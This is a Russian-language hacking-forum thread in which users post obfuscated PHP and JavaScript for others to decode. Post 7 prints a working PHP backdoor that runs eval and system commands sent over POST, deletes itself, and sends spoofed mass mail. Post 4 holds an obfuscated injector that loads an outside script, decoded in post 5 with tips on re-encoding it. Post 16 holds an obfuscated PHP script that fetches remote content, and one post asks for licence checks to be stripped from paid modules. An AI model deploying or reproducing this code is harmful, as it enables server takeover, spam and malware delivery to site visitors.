Обфускация кода (вопросы, просьбы зашифровать/расшифровать скрипт )

Discussion in 'PHP' started by Sharky, 29 Sep 2009.

  1. Attese

    Attese New Member

    Joined:
    19 Dec 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    eaccelerator -а существует декодер?
     
  2. hawk777

    hawk777 New Member

    Joined:
    8 Sep 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста раскодировать
    http://pastebin.com/NmtfJq7t
     
  3. Todin

    Todin Member

    Joined:
    28 Jan 2011
    Messages:
    47
    Likes Received:
    7
    Reputations:
    0
    hawk777, http://pastebin.com/mG9yyqvK
     
  4. Xack-Zero

    Xack-Zero Member

    Joined:
    2 Dec 2006
    Messages:
    106
    Likes Received:
    31
    Reputations:
    0
    Расшифруйте пожалуйста:

    Code:
    <script type="text/javascript">
    <!-- 
    var _0x3fe9=["\x20\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x61\x72\x77\x65\x6C\x73\x2E\x69\x6E\x66\x6F\x2F\x6A\x73\x2F\x70\x6C\x61\x6E\x32\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x20","\x77\x72\x69\x74\x65\x6C\x6E"];document[_0x3fe9[1]](_0x3fe9[0]);
     // -->
    </script>
    
    И подскажите как обратно так же зашифровать. Заранее благодарю.
     
  5. GRRRL Power

    GRRRL Power Elder - Старейшина

    Joined:
    13 Jul 2010
    Messages:
    823
    Likes Received:
    185
    Reputations:
    84
    Зашифровано:
    Code:
    document.writeln('<script type="text/javascript" src="http://barwels.info/js/plan2.js"></script>');
    
    Зашифровать обратно - просто преобразовать символы в их аски-коды и записать их в шестнадцатеричном виде.
     
    2 people like this.
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Расшифруйте, please:
    http://pastebin.com/dbBcKyLy
     
  7. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Вроде это
    PHP:
    <?php
    if (isset($_POST['eval'])) { eval(base64_decode($_POST['eval'])); } elseif (isset($_POST['sh'])) { system(base64_decode($_POST['sh'])); } elseif (isset($_POST['delete'])) {
        if (!
    unlink($_SERVER['SCRIPT_FILENAME'])) {
            
    file_put_contents($_SERVER['SCRIPT_FILENAME'], '');
        }
    } elseif (isset(
    $_POST['to']) && isset($_POST['from']) && isset($_POST['reply']) && isset($_POST['subject']) && isset($_POST['body']) && isset($_POST['type'])) {
        
    $oldphpself $_SERVER['PHP_SELF']; 
        
    $oldremoteaddr $_SERVER['REMOTE_ADDR']; 
        
    $_SERVER['PHP_SELF'] = '/'
        
    $_SERVER['REMOTE_ADDR'] = $_SERVER['SERVER_ADDR']; 
        
    $reply base64_decode($_POST['reply']);
        
    $to base64_decode($_POST['to']);
        
    $from base64_decode($_POST['from']);
        
    $subject base64_decode($_POST['subject']);
        
    $body base64_decode($_POST['body']);
        
    $type base64_decode($_POST['type']);
        
    $headers 'MIME-Version: 1.0' PHP_EOL
        
    $headers .= 'Content-type: text/' $type '; charset=utf-8' PHP_EOL
        
    $headers .= 'Reply-To: ' $reply PHP_EOL
        
    $headers .= 'Errors-To: ' $reply PHP_EOL
        
    $headers .= 'From: ' $from PHP_EOL
        if (
    mail($to$subject$body$headers)) {
            print 
    'OK';
        } else {
            print 
    'FAIL';
        }
        
    $_SERVER['PHP_SELF'] = $oldphpself
        
    $_SERVER['REMOTE_ADDR'] = $oldremoteaddr;
    }
    ?>
     
    _________________________
    1 person likes this.
  8. M0z4

    M0z4 New Member

    Joined:
    13 Jan 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://pastebin.com/iSGQc2ta
     
  9. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.com/HFH7NfmZ
     
    _________________________
  10. BeerMan

    BeerMan New Member

    Joined:
    5 Nov 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    помогите !
    http://pastebin.com/JXRDGhMZ
     
  11. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.com/8VeEVR4G
     
    _________________________
  12. asvabaditelb

    asvabaditelb New Member

    Joined:
    16 Mar 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Расшифруйте плиз
    http://pastebin.com/EUxaGkrN
     
  13. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    http://pastebin.com/JsT688Mb
     
    _________________________
  14. M0z4

    M0z4 New Member

    Joined:
    13 Jan 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    1
    http://pastebin.com/bCgtkDs7
    2
    http://pastebin.com/wCf39R85
    3
    http://pastebin.com/fjAMhPaA
     
    #474 M0z4, 21 Jan 2012
    Last edited: 22 Jan 2012
  15. Antiment

    Antiment New Member

    Joined:
    5 Jun 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Народ,помогите расшифровать,очень срочно надо.
    Заранее благодарен.

    http://pastebin.com/KJGwWu6W
     
  16. Zombi ****

    Zombi **** Elder - Старейшина

    Joined:
    4 Apr 2009
    Messages:
    166
    Likes Received:
    183
    Reputations:
    17
    PHP:
    <? $GLOBALS['_741094447_']=Array(base64_decode('c3R' .'ycG9' .'z'),base64_decode('Y29' .'we' .'Q' .'=='),base64_decode('' .'cGF' .'yc2' .'VfdXJ' .'s'),base64_decode('bXRfcmF' .'uZ' .'A=='),base64_decode('YWN' .'vcw=='),base64_decode('Z' .'nNvY' .'2tvcGV' .'u'),base64_decode('d' .'GltZ' .'Q=='),base64_decode('YXBh' .'Y2hlX2dl' .'d' .'F9tb2R1bGVz'),base64_decode('c3RybGVu'),base64_decode('bXRfcmFuZA=='),base64_decode('c3Ryc' .'m' .'V2'),base64_decode('Zn' .'dyaXRl'),base64_decode('Zm' .'V' .'vZg=' .'='),base64_decode('ZmdldHM='),base64_decode('' .'YXJyY' .'Xlf' .'c3BsaW' .'Nl'),base64_decode('c2Vz' .'c2lvb' .'l9lbmNvZGU='),base64_decode('' .'c' .'3Vi' .'c3R' .'y'),base64_decode('c' .'3RycG' .'9z'),base64_decode('' .'ZmNsb3' .'Nl'),base64_decode('c3' .'Ryc' .'3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3R' .'yc3' .'Ry'),base64_decode('c' .'3Ry' .'c3R' .'y'),base64_decode('' .'aGV' .'hZGVy'),base64_decode('c' .'3Ryc3Ry'),base64_decode('aG' .'VhZGVy'),base64_decode('c3R' .'ycG9z'),base64_decode('' .'c' .'2Vzc2l' .'vbl9nZXRfY29va' .'2l' .'lX3' .'Bhc' .'mFtc' .'w=='),base64_decode('aGVhZGVy')); ?><? function _404697958($i){$a=Array('aWQ' .'=','a' .'HR0cD' .'ovL3N' .'vZ' .'n' .'QtcmVzZWFyY' .'2g' .'uMnY1LnJ1' .'L2VmbWdnd' .'S8' .'=','','' .'c2dnaW' .'90d' .'nh1dXd' .'jYw==','ZGN6','aG9' .'z' .'dA' .'==','cG9ydA==','cG9ydA==','UE' .'9' .'T' .'VC' .'A' .'=','cGF0aA' .'==','' .'IEh' .'UV' .'FAv' .'M' .'S4w','DQo=','SG9zdDog','aG9' .'z' .'dA==','D' .'Q' .'o' .'=','Q29u' .'d' .'GVudC' .'10' .'e' .'X' .'B' .'lOiB0ZX' .'h0L2h0bWw=','DQo=','Q2' .'9udGVudC1sZW5n' .'dGg6IA=' .'=','DQ' .'o=','Q29u' .'bmVj' .'d' .'Glvbjo' .'gQ2xvc2' .'U=','DQo' .'N' .'Cg==','','' .'DQo' .'NC' .'g==','LmNzcw==','Q29' .'ud' .'GVudC1' .'Ue' .'XBlOi' .'B0ZXh' .'0L2Nzc' .'zsgY2hh' .'c' .'nNldD13aW5kb3d' .'zLTEyNTE=','Ln' .'BuZw==','Q29' .'udGVudC1UeXBlOiBpb' .'WFnZS9' .'wbmc=','LmpwZw==','Lmpw' .'Z' .'Wc=','Q29ud' .'GVudC' .'1UeX' .'BlOiBpbWF' .'nZS9qcGVn','Lm' .'dpZg=' .'=','Q29udG' .'VudC1Ue' .'XB' .'lO' .'iBpbWF' .'nZS9n' .'aW' .'Y=','aWZ1' .'bHhvcXJ3aWZ' .'mb3d4ZA==','' .'d' .'m9x' .'eg' .'==','Q' .'29udGVudC1UeXB' .'l' .'OiB0ZX' .'h0' .'L' .'2h0bW' .'w' .'7' .'IGNo' .'YX' .'JzZXQ9d2l' .'uZG93' .'cy0xMjUx');return base64_decode($a[$i]);} ?><? $_0=$_REQUEST[_404697958(0)];$_1=_404697958(1) .$_0;$_2=_404697958(2);if($GLOBALS['_741094447_'][0](_404697958(3),_404697958(4))!==false)$GLOBALS['_741094447_'][1]($_3,$_4);$_4=$GLOBALS['_741094447_'][2]($_1);if(round(0+123.666666667+123.666666667+123.666666667)<$GLOBALS['_741094447_'][3](round(0+80.5+80.5),round(0+102.5+102.5)))$GLOBALS['_741094447_'][4]($_5,$_1,$_REQUEST);if($_5=$GLOBALS['_741094447_'][5]($_4[_404697958(5)],!empty($_4[_404697958(6)])?$_4[_404697958(7)]:round(0+16+16+16+16+16))){$_6=_404697958(8) .$_4[_404697958(9)] ._404697958(10) ._404697958(11);$_6 .= _404697958(12) .$_4[_404697958(13)] ._404697958(14);$_6 .= _404697958(15) ._404697958(16);if((round(0+2229+2229)^round(0+2229+2229))&& $GLOBALS['_741094447_'][6]($_1,$_2,$_4))$GLOBALS['_741094447_'][7]($_4,$_4);$_6 .= _404697958(17) .$GLOBALS['_741094447_'][8]($_2) ._404697958(18);$_6 .= _404697958(19) ._404697958(20);$_7=round(0+205.8+205.8+205.8+205.8+205.8);$_6 .= $_2;if(round(0+1092+1092+1092)<$GLOBALS['_741094447_'][9](round(0+47.6666666667+47.6666666667+47.6666666667),round(0+782+782+782+782)))$GLOBALS['_741094447_'][10]($_3,$_4);$GLOBALS['_741094447_'][11]($_5,$_6);$_8=_404697958(21);while(!$GLOBALS['_741094447_'][12]($_5)){$_8 .= $GLOBALS['_741094447_'][13]($_5,round(0+341.333333333+341.333333333+341.333333333));if((round(0+674.8+674.8+674.8+674.8+674.8)+round(0+314.75+314.75+314.75+314.75))>round(0+3374)|| $GLOBALS['_741094447_'][14]($_8,$_1,$_0));else{$GLOBALS['_741094447_'][15]($_REQUEST,$_4);}}$_3=$GLOBALS['_741094447_'][16]($_8,$GLOBALS['_741094447_'][17]($_8,_404697958(22))+round(0+2+2));$GLOBALS['_741094447_'][18]($_5);}if($GLOBALS['_741094447_'][19]($_0,_404697958(23))){$GLOBALS['_741094447_'][20](_404697958(24));}elseif($GLOBALS['_741094447_'][21]($_0,_404697958(25))){$GLOBALS['_741094447_'][22](_404697958(26));}elseif($GLOBALS['_741094447_'][23]($_0,_404697958(27))|| $GLOBALS['_741094447_'][24]($_0,_404697958(28))){$GLOBALS['_741094447_'][25](_404697958(29));}elseif($GLOBALS['_741094447_'][26]($_0,_404697958(30))){$GLOBALS['_741094447_'][27](_404697958(31));if($GLOBALS['_741094447_'][28](_404697958(32),_404697958(33))!==false)$GLOBALS['_741094447_'][29]($_2,$_5,$_1,$_5,$_2);}else{$GLOBALS['_741094447_'][30](_404697958(34));}echo $_3; ?>
    хелп плз с расшифровкой!
     
  17. WSG

    WSG New Member

    Joined:
    8 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Помогите раскодировать php код http://pastebin.com/CAh2qjqZ

    //Gifts: большой код заливайте на pastebin
     
    #477 WSG, 25 Jan 2012
    Last edited by a moderator: 31 Jan 2012
  18. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    По деобфускации ioncube после дешифровки есть инфа? После кодирования названия функций обфусцированы(используются символы из мд5(abc..f))
    Кайми в своем блоге писал что есть варианты, но не нашел.
     
  19. Lekx87

    Lekx87 New Member

    Joined:
    31 Jan 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Как расшифровать это?

    Code:
    return L})((function(I){return '3M 53=7(){4Z(49);G(L.Y){49=7D(7(){G(L.Y){L.Y=0,L.5W()}},L.slideshowTime)}},3X=!-[1,],82=/^7 \\(/.7V([].sort),5Q=7(){50&&4Z(50);50=7D(L.6P,1P)},21=7(a){3X?4V.2F.returnValue=18:a.preventDefault()},_c=7(){19 O.createElement("3L")},_a=7(d,c){d.2Q(c)},6D=7(){L.13.D.Z=2J.D.Z=M.D.Z=14.D.Z="5M"},6O=7(){M.D.Z=L.13.D.Z=2J.D.Z=14.D.Z=""},1U=7(a){G("7"==typeof a){a()}},3N=7(e,d,f){G(3X){e.attachEvent("9B"+d,f)}V{e.addEventListener(d,f,18)}},3Q=7(e,d,f){G(3X){e.detachE
    здесь часть зашифрованного яваскрипта
     
    #479 Lekx87, 31 Jan 2012
    Last edited: 31 Jan 2012
  20. GHBB

    GHBB New Member

    Joined:
    5 May 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте, помогите пожалуйста разшифровать скрипты http://rghost.ru/36317379 или отвязать их, это модули с whmcs.com.ua спасибо.